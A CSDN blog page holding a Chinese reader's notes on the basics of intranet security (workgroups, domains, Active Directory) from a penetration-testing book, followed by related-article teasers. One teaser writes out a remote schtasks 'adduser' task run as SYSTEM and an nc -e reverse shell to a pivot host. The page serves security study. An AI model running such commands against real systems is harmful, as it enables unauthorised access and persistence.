2021-8-29《内网安全攻防》第一章内网基础知识

已于 2022-04-24 16:22:22 修改
阅读量976 收藏 2
点赞数
分类专栏: 各种靶场 文章标签: 内网
于 2021-08-30 01:03:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45290991/article/details/119987486
版权
本文介绍了内网安全的基础知识,包括工作组、域的概念,详细讲解了活动目录AD的功能,如帐号集中管理和软件集中管理。还讨论了安全域划分、DMZ屏障功能及其访问控制策略,以及域内计算机分类和权限解读,如域本地组、全局组和通用组的使用策略。
摘要由CSDN通过智能技术生成

 

 

 欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注

这是MS08067实验室的作品,我看的过程中做了一些笔记,算是复习+学习吧。

第一章、内网基础知识

工作组:

所有计算机对等,没有cs之分。相当于分小组,加入、创建工作组:右键“计算机”--->属性--->更改设置--->在“计算机名”的一栏中写入想好的名称,在“工作组”一栏中写入想要加入的工作组名称。退出工作组:同法改变工作组名称即可。

域:有安全边界的计算机集合。分为:

单域:一个域,一般一个域需要两个dc,因为一个dc坏了还能备份恢复回来

父域   域树,子域只能使用父域作为后缀    域森林       dns域名服务器(一般dns就是dc)

 活动目录AD:

一个逻辑结构,一个域内的ad在dc上,如果说域=字典,ad就是索引,里面所有域内信息都在。一个域树公用一个ad。一个域也可以公用一个AD。

AD的功能:

活动目录(Active Directory,AD)是微软提供的统一管理基础平台,ISA、Exchange、SMS

最低0.47元/天 解锁文章
热热的雨夜
关注
专栏目录
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 3019
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
内网渗透基础总结
wulanlin的博客
01-06 2343
研究内网安全我们首先需要弄明白内网是什么?在渗透测试过程中我们一般把因特网称为外网,而将其余的网络(政务网、公安网、企业内网等)定义为内网。后来我仔细思考了一下,内外网的概念其实是相对而言的,比如一台电脑同处于办公室内的小型局域网和公司的大型局域网内,那么就可以把办公室内的局域网称为内网,公司的大型局域网称为外网。而通常情况下我们会同处于公司网和因特网之内,那么就会常常把因特网称为外网,公司网称为内网,久而久之这种概念也就形成了。内网相对于外网来说通信更快、传输文件更方便、共享更便利,但是相对来说安全性也更
内网-内网安全攻防-笔记.pdf
09-18
内网-内网安全攻防-笔记.pdf
企业内网安全
最新发布
大河之犬的博客
09-20 1969
随着Docker的兴起,有些商业蜜罐产品开始利用Docker+iptables转发来做调度,不同的Docker里运行各种不同的服务,比如RDP、SSH、Telnet、MySQL、Redis等,注意后端不再是一个模拟的交互环境,而是一个真实的服务,当我们用自动化脚本对网络上各种服务进行检测时,会触发蜜罐事件。在一些重要的场所,比如机房维护操作间电脑上,放一些精心准备的Word和Excel文件,一旦有人想将这些文件带离,在终端或网络上的DLP程序能及时发现;一旦有人请求这个域名,就表明其有一定的可疑性。
内网安全攻防(一)
YUKIDDDD的博客
08-01 1093
第1章 内网基础知识1.1 内网基础知识 1.1 内网基础知识 内网也指局域网,是指在某一区域内由多台计算机互连而成的计算机组 工作组 将不同的计算机按功能进行分组就产生了工作组的概念。 计算机可以随意加入或退出工作组 工作组里所有计算机都是对等的 工作组中的计算机可以互相共享资源 域(Domain) 域是一个有安全边界的计算机集合 域的安全管理机制更加严格,用户要访问域内的资源,必须以合法的身份登录域 用户对域内的资源权限取决于用户身份 单域 在一个域内,一般要有至少两台域服务器,一台作为
内网安全攻防(三)
YUKIDDDD的博客
08-03 666
第3章 隐藏通信隧道技术3.1 基础知识3.2 网络层隧道技术3.3 传输层隧道技术3.4 应用层隧道技术3.5 SOCKS代理3.6 压缩数据3.7 上传和下载 3.1 基础知识 隧道是一种绕过端口屏蔽的通信方式,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原的后的数据包发送到响应的服务器上。 常用的隧道举例: 网络层:IPv6,ICMP,GRE 传输层:TCP,UDP,常规端口转发 应用层:SSH
内网安全-基础
weixin_44532761的博客
01-19 4269
小迪 参考引用: https://www.bilibili.com/video/BV1JZ4y1c7ro?p=64 https://www.jianshu.com/p/8580587c3201 #DMZ https://blog.csdn.net/magod/article/details/6308940 #DMZ https://www.cnblogs.com/Le30bjectNs11/p/4118098.html #Le30bjectNs11猥琐青年 VulnStack靶场 http://vuln
内网安全学习从入门到入狱-知识-内网基础知识
god_Zeo的安全博客
03-06 4041
内网安全学习从入门到入狱-知识-内网基础知识 文章目录内网安全学习从入门到入狱-知识-内网基础知识内网渗透基础基本的名词介绍工作组域活动目录(AD)DC 域控制器(DC)DNS域名服务器安全域的划分DMZ是什么?域中有哪些电脑?域内的权限分类域本地组全局组通用组A-G-DL-P 策略常用本地域组的权限 内网渗透基础 首先本文章基本上学习笔记 基本的名词介绍 工作组 工作组(Work Gr...
内网安全攻防》配套视频 之 通过防火墙m0n0wall构建内网各种环境
Ms08067安全实验室
09-21 797
内网安全防护始终是企业的一个痛点所在,近年来APT攻击更成为最火的话题之一。因此,只有熟悉内网渗透攻击的方法和步骤,才能有的放矢地做好防御措施,最大程度地保障内网安全。前言《内网安全...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1393
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础
闵行小鱼塘
04-07 5033
本篇开始阅读学习《内网安全攻防:渗透测试实战指南》,做个笔记 本篇是第一章内网渗透测试基础,基本都是些基础概念和环境搭建
局域网攻防安全
03-09
局域网是指在某一区域内由多台计算机互联成的计算机组,它 可以实现文件管理和共享等功能,一些攻击者常常会采用各种 不同的手段来攻击局域网,可能是炫耀技术,也可能是盗取信 息,无论什么目的,用户都要阻止她们的攻击,确保网络安全
内网ARP攻防教程
10-03
超详细讲解ARP攻防 首次上传文件 希望大家捧场 积分并不是太高
内网安全-基础】基础知识、信息收集、工具
12-14 4204
内网安全-基础】内网基础知识内网信息收集常用命令、内网信息收集工具
内网安全攻防(二)
YUKIDDDD的博客
08-02 429
内网信息收集2.1 概述2.2 收集本机信息2.3 查询当前权限2.4 判断是否存在域2.5 探测域内存活主机2.6 扫描域内端口2.7 收集域内基础信息2.8 查找域控制器2.9 获取域内的用户和管理员信息2.10 定位域管理员2.11 查找域管理进程2.12 域管理员模拟方法简介2.13 利用PowserShell收集域信息2.14 域分析工具BloodHound2.15 敏感数据的防护2.16 分析域内网段划分情况及拓扑结构 2.1 概述 我是谁?——对当前机器角色的判断 这是哪?——对当前机器所处
网络攻防内网安全横向渗透权限提升
weixin_46626737的博客
06-30 788
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
内网安全攻防》配套视频 之 安全域划分、域内权限解读
Ms08067安全实验室
09-15 481
前言《内网安全攻防 -渗透测试实战指南》出版已有八个月,相信,一定带领很多朋友入门了内网渗透,当然,也有不少读者反馈,看完还是懵懵懂懂,那怎么办?《内网安全攻防》图书出版的同时我们就给...
内网安全攻防:渗透测试实战指南》读书笔记(五):域内横向移动分析及防御
闵行小鱼塘
04-18 5494
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章系统的介绍了域内横向移动的主要方法,复现并剖析了内网域方面最重要、最经典的漏洞,同时给出了相应的防范方法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值